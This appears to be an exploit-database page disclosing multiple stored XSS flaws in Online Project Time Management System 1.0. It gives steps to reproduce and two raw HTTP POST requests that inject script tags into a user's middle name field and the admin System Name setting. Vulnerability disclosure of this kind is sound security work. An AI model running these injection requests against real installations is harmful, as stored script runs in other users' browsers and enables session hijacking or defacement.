Online project time management system 1.0 multiple stored cross site scripting (xss) (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2022-01-25 | Type : webapps | Platform : php
This exploit / vulnerability Online project time management system 1.0 multiple stored cross site scripting (xss) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...

# Steps to reproduce (with employee Access)

# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Add XSS payload to any field of the user's name.
#Click Update


=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"

Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"

<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================

-----------------------------------------------------------------------------

# Steps to reproduce (with Admin access)

# Log in to the admin panel
# Go to : http://localhost/ptms/admin/?page=system_info
# Add XSS payload to the 'System Name' field
#Click Update


=================

POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"

Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"

PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq--

=================

Online project time management system 1.0 multiple stored cross site scripting (xss) (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Online project time management system 1.0 multiple stored cross site scripting (xss) (authenticated) Vulnerability / Exploit